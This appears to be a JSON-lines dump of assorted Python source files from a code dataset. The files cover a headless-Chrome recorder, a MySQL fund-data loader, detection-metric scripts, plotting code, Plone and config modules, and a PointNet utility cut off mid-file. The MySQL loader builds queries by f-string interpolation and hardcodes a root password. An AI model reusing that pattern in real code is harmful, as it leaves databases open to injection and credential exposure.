tab.Inspector.enable ()\n tab.Network.clearBrowserCache ()\n if tab.Network.canClearBrowserCookies ()['result']:\n tab.Network.clearBrowserCookies ()\n\n return self\n\n def __exit__ (self, exc_type, exc_value, traceback):\n self.tab.Page.stopLoading ()\n self.tab.stop ()\n self.browser.close_tab(self.tab)\n return False\n\n def __len__ (self):\n return len (self.requests)\n\n def __iter__ (self):\n return iter (self.queue)\n\n def start (self):\n self.tab.Page.navigate(url=self.url)\n\n # use event to signal presence of new items. 
This way the controller\n # can wait for them without polling.\n def _append (self, item):\n self.queue.append (item)\n self.notify.set ()\n\n def _appendleft (self, item):\n self.queue.appendleft (item)\n self.notify.set ()\n\n # internal chrome callbacks\n def _requestWillBeSent (self, **kwargs):\n reqId = kwargs['requestId']\n req = kwargs['request']\n logger = self.logger.bind (reqId=reqId, reqUrl=req['url'])\n\n url = urlsplit (req['url'])\n if url.scheme not in self.allowedSchemes:\n return\n\n item = self.requests.get (reqId)\n if item:\n # redirects never “finish” loading, but yield another requestWillBeSent with this key set\n redirectResp = kwargs.get ('redirectResponse')\n if redirectResp:\n # create fake responses\n resp = {'requestId': reqId, 'response': redirectResp, 'timestamp': kwargs['timestamp']}\n item.setResponse (resp)\n resp = {'requestId': reqId, 'encodedDataLength': 0, 'timestamp': kwargs['timestamp']}\n item.setFinished (resp)\n item.isRedirect = True\n logger.info ('redirect', uuid='85eaec41-e2a9-49c2-9445-6f19690278b8', target=req['url'])\n self._append (item)\n else:\n logger.warning ('request exists', uuid='2c989142-ba00-4791-bb03-c2a14e91a56b')\n\n item = Item (self.tab)\n item.setRequest (kwargs)\n self.requests[reqId] = item\n logger.debug ('request', uuid='55c17564-1bd0-4499-8724-fa7aad65478f')\n\n def _responseReceived (self, **kwargs):\n reqId = kwargs['requestId']\n item = self.requests.get (reqId)\n if item is None:\n return\n\n resp = kwargs['response']\n logger = self.logger.bind (reqId=reqId, respUrl=resp['url'])\n url = urlsplit (resp['url'])\n if url.scheme in self.allowedSchemes:\n logger.debug ('response', uuid='84461c4e-e8ef-4cbd-8e8e-e10a901c8bd0')\n item.setResponse (kwargs)\n else:\n logger.warning ('scheme forbidden', uuid='2ea6e5d7-dd3b-4881-b9de-156c1751c666')\n\n def _loadingFinished (self, **kwargs):\n \"\"\"\n Item was fully loaded. 
For some items the request body is not available\n when responseReceived is fired, thus move everything here.\n \"\"\"\n reqId = kwargs['requestId']\n item = self.requests.pop (reqId, None)\n if item is None:\n # we never recorded this request (blacklisted scheme, for example)\n return\n req = item.request\n logger = self.logger.bind (reqId=reqId, reqUrl=req['url'])\n resp = item.response\n if req['url'] != resp['url']:\n logger.error ('url mismatch', uuid='7385f45f-0b06-4cbc-81f9-67bcd72ee7d0', respUrl=resp['url'])\n url = urlsplit (resp['url'])\n if url.scheme in self.allowedSchemes:\n logger.info ('finished', uuid='5a8b4bad-f86a-4fe6-a53e-8da4130d6a02')\n item.setFinished (kwargs)\n self._append (item)\n\n def _loadingFailed (self, **kwargs):\n reqId = kwargs['requestId']\n self.logger.warning ('loading failed',\n uuid='68410f13-6eea-453e-924e-c1af4601748b',\n errorText=kwargs['errorText'],\n blockedReason=kwargs.get ('blockedReason'))\n item = self.requests.pop (reqId, None)\n item.failed = True\n self._append (item)\n\n def _entryAdded (self, **kwargs):\n \"\"\" Log entry added \"\"\"\n entry = kwargs['entry']\n level = {'verbose': Level.DEBUG, 'info': Level.INFO,\n 'warning': Level.WARNING,\n 'error': Level.ERROR}.get (entry.pop ('level'), Level.INFO)\n entry['uuid'] = 'e62ffb5a-0521-459c-a3d9-1124551934d2'\n self.logger (level, 'console', **entry)\n\n def _javascriptDialogOpening (self, **kwargs):\n t = kwargs.get ('type')\n if t in {'alert', 'confirm', 'prompt'}:\n self.logger.info ('js dialog',\n uuid='d6f07ce2-648e-493b-a1df-f353bed27c84',\n action='cancel', type=t, message=kwargs.get ('message'))\n self.tab.Page.handleJavaScriptDialog (accept=False)\n elif t == 'beforeunload':\n # we must accept this one, otherwise the page will not unload/close\n self.logger.info ('js dialog',\n uuid='96399b99-9834-4c8f-bd93-cb9fa2225abd',\n action='proceed', type=t, message=kwargs.get ('message'))\n self.tab.Page.handleJavaScriptDialog (accept=True)\n else:\n self.logger.warning ('js dialog unknown', uuid='3ef7292e-8595-4e89-b834-0cc6bc40ee38', **kwargs)\n\n def _targetCrashed (self, **kwargs):\n self.logger.error ('browser crashed', uuid='6fe2b3be-ff01-4503-b30c-ad6aeea953ef')\n # priority message\n self._appendleft (BrowserCrashed ())\n\nimport subprocess, os, time\nfrom tempfile import mkdtemp\nimport shutil\n\nclass ChromeService:\n \"\"\" Start Google Chrome listening on a random port \"\"\"\n\n __slots__ = ('binary', 'windowSize', 'p', 'userDataDir')\n\n def __init__ (self, binary='google-chrome-stable', windowSize=(1920, 1080)):\n self.binary = binary\n self.windowSize = windowSize\n self.p = None\n\n def __enter__ (self):\n assert self.p is None\n self.userDataDir = mkdtemp ()\n args = [self.binary,\n '--window-size={},{}'.format (*self.windowSize),\n '--user-data-dir={}'.format (self.userDataDir), # use temporory user dir\n '--no-default-browser-check',\n '--no-first-run', # don’t show first run screen\n '--disable-breakpad', # no error reports\n '--disable-extensions',\n '--disable-infobars',\n '--disable-notifications', # no libnotify\n '--headless',\n '--disable-gpu',\n '--hide-scrollbars', # hide scrollbars on screenshots\n '--mute-audio', # don’t play any audio\n '--remote-debugging-port=0', # pick a port. 
XXX: we may want to use --remote-debugging-pipe instead\n '--homepage=about:blank',\n 'about:blank']\n # start new session, so ^C does not affect subprocess\n self.p = subprocess.Popen (args, start_new_session=True,\n stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n port = None\n # chrome writes its current active devtools port to a file. due to the\n # sleep() this is rather ugly, but should work with all versions of the\n # browser.\n for i in range (100):\n try:\n with open (os.path.join (self.userDataDir, 'DevToolsActivePort'), 'r') as fd:\n port = int (fd.readline ().strip ())\n break\n except FileNotFoundError:\n time.sleep (0.2)\n if port is None:\n raise Exception ('Chrome died on us.')\n\n return 'http://localhost:{}'.format (port)\n\n def __exit__ (self, *exc):\n self.p.terminate ()\n self.p.wait ()\n shutil.rmtree (self.userDataDir)\n self.p = None\n\nclass NullService:\n __slots__ = ('url')\n\n def __init__ (self, url):\n self.url = url\n\n def __enter__ (self):\n return self.url\n\n def __exit__ (self, *exc):\n pass\n\n","sub_path":"crocoite/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":15001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"453326425","text":"import pymysql\nimport pandas as pd\nimport logging\nimport os\n\ndef putFundValueInMysql( fund_file ):\n\t'''根据id将基金数据写入数据库\n\t\t参数:1 id\n\t'''\n\t# 获取基金数据(id, 名称)\n\tfund_values = pd.read_csv(fund_file)\n\tid = fund_file.split('_')[1].split('.')[0]\n\n\t# 连接数据库\n\tconn = pymysql.connect(host='localhost', user='root', password='123456', charset='utf8')\n\tcur = conn.cursor('')\n\tcur.execute('use funddb')\n\n\t# 判断是否已写入mysql\n\tnum = cur.execute(f\"select * from fund_value where fund_id='{id}'\")\n\tif num != 0:\n\t\tlogging.info('[ERROR][putFundValueInMysql] id=%s has exist!', id)\n\t\t# 已经写入, 不用再次写入\n\t\treturn\t\n\n\tlogging.info('[INFO][putFundValueInMysql] begin write id=%s', id)\n\t# 将基金数据写入数据库\n\tfor index, row in fund_values.iterrows():\n\t\tdate = row['fund_date']\n\t\tif date == 'nan':\n\t\t\tcontinue\n\t\tvalue = row['fund_value']\n\t\ttry:\n\t\t\tcur.execute(f\"insert into fund_value(fund_id, date, value) values('{id}','{date}','{value}')\")\n\t\t\tconn.commit()\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tcontinue\n\n\t# 关闭数据库连接\n\tcur.close()\n\tconn.close()\n\treturn\t\n\ndef travelsalFunds():\n\t# 获取fund文件\n\tfile_list = os.listdir('../Data')\n\tfile_list.remove('funds.csv')\n\t\n\tfor fund_file in file_list:\n\t\tfund_file = '../Data/' + fund_file\n\t\tputFundValueInMysql(fund_file)\n\nif __name__ == '__main__':\n\tlogging.basicConfig(filename='logger.log', level=logging.INFO)\n\ttravelsalFunds()\n","sub_path":"17-Zhihu/1709-12-Zhihu/170818TianTianFund/DAO/putFundValueInMysql.py","file_name":"putFundValueInMysql.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"46305998","text":"import option\nimport os, time, shutil\nimport utils_map, size_ap_v2\nimport json\n# from collections import OrderedDict\n\nstart = time.time()\nopt = option.options\n\ngt_json_path = opt.gt_json_path\ndr_json_path = opt.dr_json_path\n\n# if there are no classes to ignore then replace None by empty list\nif opt.ignore is None:\n opt.ignore = []\n\n# make sure that the cwd() is the location of the python script (so that every path makes sense)\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\nresults_files_path = \"results\"\nif not os.path.exists(results_files_path):\n os.makedirs(results_files_path)\nelse:\n shutil.rmtree(results_files_path)\nresult_file_path = results_files_path + \"/results\" + \".txt\"\n\nplot_result_path = \"plot_figures\"\nif opt.draw_plot:\n if opt.plot_save:\n if os.path.exists(plot_result_path):\n shutil.rmtree(plot_result_path)\n os.makedirs(plot_result_path)\n else:\n os.makedirs(plot_result_path)\n\n\nfinal_result_path = \"final_result.json\"\nif not os.path.exists(results_files_path):\n os.makedirs(results_files_path)\nelse:\n shutil.rmtree(results_files_path)\n# result_file_path = final_result_path + \"/results\" + \".json\"\n\n\n\nclass_dict = utils_map.make_gt_list(gt_json_path)\ngt_counter_per_class, gt_counter_per_size, counter_images_per_size, gt \\\n = utils_map.get_gt_match(gt_json_path, class_dict)\n\n\ngt_classes = list(class_dict.values())\n# sort classes alphabetically\n\ngt_classes = sorted(gt_classes)\nn_classes = len(gt_classes)\n\nif opt.set_class_iou is not None:\n utils_map.check_format_class_iou(opt, gt_classes)\ndet_counter_per_classes, dr = utils_map.dr_json(dr_json_path, class_dict)\ndr_classes = list(det_counter_per_classes.keys())\ndr_sizes = [\"small\", \"medium\", \"large\"]\n\n\ncount_true_positives, mAP, ap_dictionary, precision_dict, recall_dict = \\\n utils_map.calculate_ap(result_file_path, plot_result_path, gt_classes, opt, gt_counter_per_class, dr, gt)\n\nsize_count_true_positives = \\\n size_ap_v2.calculate_ap(gt_classes, opt, dr, gt)\n\nwith open(result_file_path, 'a') as results_file:\n\n '''ap for classes'''\n results_file.write(\"\\n# Number of gt objects per class\\n\")\n for class_name in sorted(gt_counter_per_class):\n results_file.write(class_name + \": \" + str(gt_counter_per_class[class_name]) + \"\\n\")\n\n for class_name in dr_classes:\n if class_name not in gt_classes:\n count_true_positives[class_name] = 0\n\n results_file.write(\"\\n# Number of detected objects per class\\n\")\n for class_name in sorted(gt_classes):\n try: n_det = det_counter_per_classes[class_name]\n except: n_det = 0 # If there is no gt class in dt, n_dt = 0\n text = class_name + \": \" + str(n_det)\n text += \" (tp:\" + str(count_true_positives[class_name]) + \"\"\n text += \", fp:\" + str(n_det - count_true_positives[class_name]) + \")\\n\"\n results_file.write(text)\n\n '''ground truth & detection number for sizes'''\n results_file.write(\"\\n# Number of gt objects per size\\n\")\n for class_name in gt_counter_per_size:\n results_file.write(class_name + \": \" + str(gt_counter_per_size[class_name]) + \"\\n\")\n\n results_file.write(\"\\n# Number of detected objects per size\\n\")\n for class_name in dr_sizes:\n text = class_name + \": \" + str(size_count_true_positives[class_name]) + \"\\n\"\n results_file.write(text)\n\nutils_map.print_configuration(result_file_path, opt)\n\n\nfinish = time.time()\nprint(\"time: \", finish - 
start)\n\n\n\n\"\"\"---------------------------------------------------\"\"\"\n\ndata = {}\ndata[\"mAP\"] = mAP\ndata[\"IoU\"] = opt.iou_threshold\ndata[\"gt_path\"] = gt_json_path\ndata[\"dr_path\"] = dr_json_path\ndata[\"time\"] = finish - start\ndata[\"average precision\"] = ap_dictionary\npositive_dict = {}\nsize_dict = {}\n\nwith open(final_result_path, 'w') as final_result_file:\n for class_name in sorted(gt_counter_per_class):\n try: n_det = det_counter_per_classes[class_name]\n except: n_det = 0\n if class_name not in det_counter_per_classes.keys():\n det_counter_per_classes[class_name] = 0\n positive_dict[class_name] = {\"tp\" : count_true_positives[class_name],\n \"fp\" : n_det - count_true_positives[class_name],\n \"gt_count\" : gt_counter_per_class[class_name],\n \"prediction_count\": det_counter_per_classes[class_name],\n \"precision\": precision_dict[class_name],\n \"recall\": recall_dict[class_name]}\n\n size_dict[\"small\"] = {\"ground_truth\": gt_counter_per_size[\"small\"],\n \"prediction\": size_count_true_positives[\"small\"]}\n\n size_dict[\"medium\"] = {\"ground_truth\": gt_counter_per_size[\"medium\"],\n \"prediction\": size_count_true_positives[\"medium\"]}\n\n size_dict[\"large\"] = {\"ground_truth\": gt_counter_per_size[\"large\"],\n \"prediction\": size_count_true_positives[\"large\"]}\n\n\n data[\"class_count\"] = positive_dict\n data[\"scale_count\"] = size_dict\n json.dump(data, final_result_file)\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"456948955","text":"\"\"\"\nThis file sends the data collected by the script 'swc-main.py'\nto server.\n\"\"\"\n\nimport json\nimport sys\nimport datetime\nimport platform as _platform\n\ntry:\n import httplib as http_client\nexcept ImportError:\n import http.client as http_client\n\n\ndef submit(successes_list, failures_list, HOST):\n \"\"\"\n This function sends the details of failures and successes to server.\n \"\"\"\n\n endpoint = \"/installation_data/\"\n\n try:\n with open('.swc_submission_id', 'r') as f:\n first_line = f.readline()\n unique_id = first_line.split(\"[key:]\")[1]\n date = first_line.split(\"[key:]\")[0]\n if date != str(datetime.date.today()):\n unique_id = None\n except:\n unique_id = None\n\n successful_installs = []\n failed_installs = failures_list\n for checker, version in successes_list:\n successful_installs.append(\n {\n \"name\": checker.full_name(),\n \"version\": version\n }\n )\n\n user_system_info = {\n \"distribution_name\": _platform.linux_distribution()[0],\n \"distribution_version\": _platform.linux_distribution()[1],\n \"system\": _platform.system(),\n \"system_version\": _platform.version(),\n \"machine\": _platform.machine(),\n \"system_platform\": _platform.platform(),\n \"python_version\": _platform.python_version()\n }\n\n headers = {\"Content-Type\": \"application/json\"}\n data = {\n \"successful_installs\": successful_installs,\n \"failed_installs\": failed_installs,\n \"user_system_info\": user_system_info,\n \"unique_user_id\": unique_id\n }\n\n def senddata():\n final_data = json.dumps(data)\n conn = http_client.HTTPConnection(HOST)\n print(\"\\nPushing the data to server....\\n\")\n try:\n conn.request(\"POST\", endpoint, final_data, headers=headers)\n response = conn.getresponse()\n response_string = response.read()\n if response.status == 200:\n print(\"\\nSuccessfully Pushed to Server!\")\n response = json.loads(response_string.decode('utf-8'))\n unique_id = response.get(\"key\")\n file = open('.swc_submission_id', 'w+')\n file.write(str(datetime.date.today()) + \"[key:]\" + unique_id)\n else:\n print(\"\\nSomething bad happened at Server!\")\n except:\n print(\"\\nConnection could not be established with server!\")\n conn.close()\n\n global input\n try:\n input = raw_input # making it compatible for Python 3.x and 2.x\n except NameError:\n pass\n choice = input(\"\\nTo improve our lessons, we gather anonymous data about failed package installations.\"\n \" Can we send anonymous list of your packages? (y/N): \")\n if choice == 'y' or choice == 'Y':\n workshop_id = input(\"Please enter your workshop name (similar to '2016-08-13-place', ask your instructor for details) (none by default): \")\n if not workshop_id:\n workshop_id = None\n email = input(\"What is your email address (none by default): \")\n if not email:\n email = None\n data['user_system_info']['email_id'] = email\n data['user_system_info']['workshop_id'] = workshop_id\n senddata()\n else:\n return\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"382742863","text":"\"\"\"\nPlot LFPs in the time domain.\n\n\"\"\"\n__date__ = \"August - September 2021\"\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import zscore\n\nimport lpne\n\n\n\ndef plot_lfps(lfps, rois=None, t1=0.0, t2=None, fs=1000, y_space=4.0,\n alpha=0.85, lw=1.0, window_duration=None, fn='temp.pdf'):\n \"\"\"\n Plot the LFPs in the specified time range.\n\n Parameters\n ----------\n lfps : dict\n Maps ROI names to LFPs.\n rois : None or list of str\n Which ROIs to plot. If `None`, all the ROIs are plotted.\n t1 : float\n Start time, in seconds.\n t2 : None or float, optional\n End time, in seconds. If `None`, this is taken to be the end\n of the LFP.\n fs : int\n Samplerate, in Hz.\n y_space : float, optional\n Vertical spacing between LFPs.\n alpha : float, optional\n Passed to `pyplot.plot`.\n lw : float, optional\n Passed to `pyplot.plot`.\n window_duration : None or float\n Window duration, in seconds. If `None`, no window markers are plotted.\n fn : str\n Image filename\n \"\"\"\n # Figure out ROIs.\n if rois is None:\n rois = sorted([i for i in lfps.keys() if i not in lpne.IGNORED_KEYS])\n # Figure out times.\n i1 = int(fs * t1)\n if t2 is None:\n i2 = len(lfps[list(lfps.keys())[0]])\n else:\n i2 = int(fs * t2)\n t_vals = np.linspace(t1, t2, i2-i1)\n # Plot.\n lfp_num = 0\n for roi in rois:\n trace = zscore(lfps[roi].flatten()[i1:i2])\n plt.plot(t_vals, lfp_num*y_space+trace, lw=lw, alpha=alpha)\n lfp_num += 1\n pretty_rois = [roi.replace('_', ' ') for roi in rois]\n plt.yticks(\n y_space*np.arange(len(rois)),\n pretty_rois,\n size='xx-small',\n rotation=30,\n )\n ax = plt.gca()\n for dir in ['top', 'left', 'right']:\n ax.spines[dir].set_visible(False)\n if window_duration is not None:\n i1 = int(np.ceil(t1/window_duration))\n i2 = 1 + int(np.floor(t2/window_duration))\n window_ts = [window_duration*i for i in range(i1,i2)]\n for window_t in window_ts:\n plt.axvline(x=window_t, c='k', lw=1.0, ls='--')\n plt.xlabel('Time (s)')\n plt.savefig(fn)\n plt.close('all')\n\n\n\nif __name__ == '__main__':\n pass\n\n\n###\n","sub_path":"lpne/plotting/lfp_plots.py","file_name":"lfp_plots.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"145531147","text":"import martian\nimport grokcore.component\n\nfrom zope.component import queryUtility\nfrom zope.component import provideUtility\n\nfrom zope.component.interfaces import IFactory\nfrom zope.component.factory import Factory\n\nfrom plone.dexterity.content import DexterityContent\n\nfrom App.class_init import InitializeClass\ntry:\n from OFS.metaconfigure import registerClass\nexcept ImportError:\n # BBB\n from Products.Five.fiveconfigure import registerClass\n\n\nclass add_permission(martian.Directive):\n \"\"\"Directive used to specify the add permission of an object\n \"\"\"\n scope = martian.CLASS\n store = martian.ONCE\n default = None\n validate = martian.validateText\n\n def factory(self, permission):\n return permission\n\n\nclass ContentGrokker(martian.ClassGrokker):\n martian.component(DexterityContent)\n\n martian.directive(add_permission, default=None)\n martian.directive(grokcore.component.name, default=None)\n\n def execute(self, class_, config, add_permission, name, **kw):\n\n # Register class if a meta type was specified.\n # (most types will probably not need this.)\n\n if add_permission:\n meta_type = getattr(class_, 'meta_type', None)\n registerClass(config, class_, meta_type, add_permission)\n\n # Register a factory utility - defer this to the end of ZCML\n # processing, since there may have been another utility manually\n # registered\n\n if name:\n config.action(\n discriminator=('dexterity:registerFactory', class_, name),\n callable=register_factory,\n args=(class_, name),\n order=9999,\n )\n\n # Initialise class security\n\n config.action(\n discriminator=('dexterity:registerClass', class_),\n callable=InitializeClass,\n args=(class_,)\n )\n\n return True\n\n\ndef register_factory(class_, name):\n\n # Register factory if not already registered\n factory = queryUtility(IFactory, name=name)\n if factory is None:\n provideUtility(Factory(class_), IFactory, name)\n\n__all__ = ('portal_type', 'meta_type', 'add_permission',)\n","sub_path":"plone/directives/dexterity/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"107196732","text":"# -*- coding: utf-8 -*-\n\naxes = [(u'Assemblée',{'titre':u\"Votes de l'Assemblée\",'source':'assemblee','label':'libelle','key':'libelleAbrev',\n 'item_field':'organes','item_compare':'$contains'}),\n ('Groupes',{'titre':u\"Votes par Groupe parlementaire\",'source':'organes','label':'libelle','key':'uid',\n 'item_field':'groupe','item_compare':'$eq'}),\n ('Commissions',{'titre':u\"Votes par Commission parlementaire\",'source':'commissions','label':'libelle','key':'uid',\n 'item_field':'commissions','item_compare':'$contains'}),\n ('Région',{'titre':u\"Votes par région\",'source':'acteurs','label':'region','key':'region',\n 'item_field':'region','item_compare':'$eq'}),\n ('Type Région',{'titre':u\"Votes par type de région\",'source':'acteurs','label':'typeregion','key':'typeregion',\n 'item_field':'typeregion','item_compare':'$eq'}),\n (u'Département',{'titre':u\"Votes par département\",'source':'acteurs','label':'departement','key':'departement',\n 'item_field':'departement','item_compare':'$eq','hidechart':True}),\n ('Ages',{'titre':u\"Votes par age\",'source':'acteurs','label':'classeage','key':'classeage',\n 'item_field':'classeage','item_compare':'$eq'}),\n ('CSP',{'titre':u\"Votes par Catégorie Socio-Professionelle\",'source':'acteurs','label':'csp','key':'csp',\n 'item_field':'csp','item_compare':'$eq'}),\n ('Sexe',{'titre':u\"Votes par sexe\",'source':'acteurs','label':'sexe','key':'sexe',\n 'item_field':'sexe','item_compare':'$eq'}),\n ]\naxes = {'groupes':{'libelle':'Groupes',\n 'elements':'G',\n 'hidechart':False,\n 'titre':'Votes par Groupe parlementaire',\n 'source':{'nom':'organes','filtre':{'codeType':'GP','actif':True},'key':'uid','label':'libelle'},\n 'votes':{'field':'groupe'}},\n 'assemblee':{'libelle':'Assemblée',\n 'elements':'G',\n 'hidechart':False,\n 'titre':\"Votes de l'Assemblée\",\n 'source':{'nom':'organes','filtre':{'codeType':'ASSEMBLEE','actif':True},'key':'libelleAbrev','label':'libelle'},\n 'votes':{'field':'organes'}},\n 'commissions':{'libelle':'Commissions',\n 'elements':'G',\n 'titre':'Votes par Commissions',\n 'source':{'nom':'organes','filtre':{'$and':[{'$or':[{'codeType':'COMPER'},{'codeType':'CONFPT'}]},{'actif':True}]},'key':'uid','label':'libelle'},\n 'votes':{'field':'commissions'}},\n 'regions':{'libelle':'Régions',\n 'elements':'G',\n 'titre':'Votes par Régions',\n 'source':{'nom':'acteurs','filtre':{},'key':'region','label':'region'},\n 'votes':{'field':'region'}},\n 'typeregion':{'libelle':'Type Régions',\n 'elements':'G',\n 'titre':'Votes par Type de régions',\n 'source':{'nom':'acteurs','filtre':{},'key':'typeregion','label':'typeregion'},\n 'votes':{'field':'typeregion'}},\n 'departements':{'libelle':'Départements',\n 'elements':'G',\n 'titre':'Votes par Départements',\n 'source':{'nom':'acteurs','filtre':{},'key':'departement','label':'departement'},\n 'votes':{'field':'departement'}},\n 'ages':{'libelle':\"Classes d'age\",\n 'elements':'G',\n 'titre':\"Votes par classe d'age\",\n 'source':{'nom':'acteurs','filtre':{},'key':'classeage','label':'classeage'},\n 'votes':{'field':'classeage'}},\n 'csp':{'libelle':\"Catégorie Socio-professionnelle\",\n 'elements':'G',\n 'titre':'Votes par Catégorie Socio-professionnelle',\n 'source':{'nom':'acteurs','filtre':{},'key':'csp','label':'csp'},\n 'votes':{'field':'csp'}},\n 'sexe':{'libelle':\"Sexe\",\n 'elements':'G',\n 'titre':'Votes par sexe',\n 'source':{'nom':'acteurs','filtre':{},'key':'sexe','label':'sexe'},\n 'votes':{'field':'sexe'}},\n 
'depute':{'libelle':\"Députés\",\n 'elements':'P',\n 'titre':'Votes par député',\n 'source':{'nom':'acteurs','filtre':{},'key':'uid','label':'prenomnom'},\n 'votes':{'field':'uid'}},\n\n 'scrutin':{'libelle':\"Scrutins\",\n 'elements':'G',\n 'tris':['datescrutin'],\n 'tri_defaut':'datescrutin',\n 'titre':'Votes par scrutin',\n 'source':{'nom':'scrutins','filtre':{},'key':'scrutin_id','label':'scrutin_fulldesc'},\n 'votes':{'field':'scrutin_id'}},\n 'typescrutin':{'libelle':\"Type scrutins\",\n 'elements':'G',\n 'tris':['datescrutin'],\n 'tri_defaut':'datescrutin',\n 'titre':'Votes par type de scrutin',\n 'source':{'nom':'scrutins','filtre':{},'key':'scrutin_type','label':'scrutin_typeLibelle'},\n 'votes':{'field':'scrutin_type'}},\n\n 'dossierleg':{'libelle':\"Dossier législatif\",\n 'elements':'G',\n 'tris':['datescrutin'],\n 'tri_defaut':'datescrutin',\n 'titre':'Votes par dossier législatif',\n 'source':{'nom':'scrutins','filtre':{},'key':'scrutin_dossier','label':'scrutin_dossierLibelle'},\n 'votes':{'field':'scrutin_dossier'}},\n\n }\naxes_order = ['assemblee','groupes','commissions','typeregion','regions','departements','ages','csp','sexe','depute','scrutin','typescrutin','dossierleg']\ndef vide(ctx,v):\n if (v=='-'):\n return float(-1) if ctx['desc']=='1' else float(10000000)\n else:\n return v\n\nimport datetime\nsortfcts = {\n 'participation': {'libelle':'Participation','fct':lambda ctx,x:vide(ctx,x['participation'])},\n 'pctpour': {'libelle':'% Votes pour', 'fct': lambda ctx,x:vide(ctx,x['stats'][ctx['suffrages']]['pour']['pct'])},\n 'pctcontre': {'libelle':'% Votes contre', 'fct': lambda ctx,x:vide(ctx,x['stats'][ctx['suffrages']]['contre']['pct'])},\n 'pctabs': {'libelle':'% Votes abstention', 'fct': lambda ctx,x:vide(ctx,x['stats'][ctx['suffrages']]['abstention']['pct'])},\n 'alpha': {'libelle':'Ordre Alphabétique', 'fct': lambda ctx,x:x['label']},\n 'ficompat': {'libelle':'FI-Compatibilité', 'fct': lambda ctx,x:vide(ctx,x['stats']['fiemcpt']['votefi']['pct'])},\n 'emcompat': {'libelle':'EM-Compatibilité', 'fct': lambda ctx,x:vide(ctx,x['stats']['fiemcpt']['voteem']['pct'])},\n 'datescrutin': {'libelle':'par N° de scrutin', 'fct': lambda ctx,x:x['scrutin_num']}\n }\nsortfcts_order = ['participation','pctpour','pctcontre','pctabs','alpha','ficompat','emcompat']\n\nimport locale\nlocale.setlocale(locale.LC_ALL, 'fr_FR.utf8')\n","sub_path":"models/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"536306664","text":"#!/usr/bin/env python2.7\n\nimport unittest\nimport timecalc\n\nclass TestTime(unittest.TestCase):\n\n def test_chronos1(self):\n result = timecalc.chronos(2, [0, 3], [1, 5])\n expected = 8\n self.assertEqual(expected, result)\n \n def test_chronos2(self):\n result = timecalc.chronos(3, [-3, 3, 5], [0, 5, -1])\n expected = 12\n self.assertEqual(expected, result)\n \nimport sys \n \ndef main(out = sys.stderr, verbosity = 2): \n loader = unittest.TestLoader() \n \n suite = loader.loadTestsFromModule(sys.modules[__name__]) \n unittest.TextTestRunner(out, verbosity = verbosity).run(suite) \n \nif __name__ == '__main__': \n with open('unittestresult.txt', 'w') as f: \n main(f) \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_timecalc2.py","file_name":"test_timecalc2.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"294028145","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import einsum\nfrom einops import rearrange, repeat\nfrom pointnet2_ops import pointnet2_utils\n\ndef square_distance(src, dst):\n \"\"\"\n Calculate Euclid distance between each two points.\n src^T * dst = xn * xm + yn * ym + zn * zm;\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\n Input:\n src: source points, [B, N, C]\n dst: target points, [B, M, C]\n Output:\n dist: per-point square distance, [B, N, M]\n \"\"\"\n B, N, _ = src.shape\n _, M, _ = dst.shape\n dist = -2 * torch.matmul(src, dst.permute(0, 2, 1))\n dist += torch.sum(src ** 2, -1).view(B, N, 1)\n dist += torch.sum(dst ** 2, -1).view(B, 1, M)\n return dist\n\n\ndef index_points(points, idx):\n \"\"\"\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S]\n Return:\n new_points:, indexed points data, [B, S, C]\n \"\"\"\n device = points.device\n B = points.shape[0]\n view_shape = list(idx.shape)\n view_shape[1:] = [1] * (len(view_shape) - 1)\n repeat_shape = list(idx.shape)\n repeat_shape[0] = 1\n batch_indices = torch.arange(B, dtype=torch.long).to(device).view(view_shape).repeat(repeat_shape)\n new_points = points[batch_indices, idx, :]\n return new_points\n\n\ndef farthest_point_sample(xyz, npoint):\n \"\"\"\n Input:\n xyz: pointcloud data, [B, N, 3]\n npoint: number of samples\n Return:\n centroids: sampled pointcloud index, [B, npoint]\n \"\"\"\n device = xyz.device\n B, N, C = xyz.shape\n centroids = torch.zeros(B, npoint, dtype=torch.long).to(device)\n distance = torch.ones(B, N).to(device) * 1e10\n farthest = torch.randint(0, N, (B,), dtype=torch.long).to(device)\n batch_indices = torch.arange(B, dtype=torch.long).to(device)\n for i in range(npoint):\n centroids[:, i] = farthest\n centroid = xyz[batch_indices, farthest, :].view(B, 1, 3)\n dist = torch.sum((xyz - centroid) ** 2, -1)\n distance = torch.min(distance, dist)\n farthest = torch.max(distance, -1)[1]\n return centroids\n\n\ndef query_ball_point(radius, nsample, xyz, new_xyz):\n \"\"\"\n Input:\n radius: local region radius\n nsample: max sample number in local region\n xyz: all points, [B, N, 3]\n new_xyz: query points, [B, S, 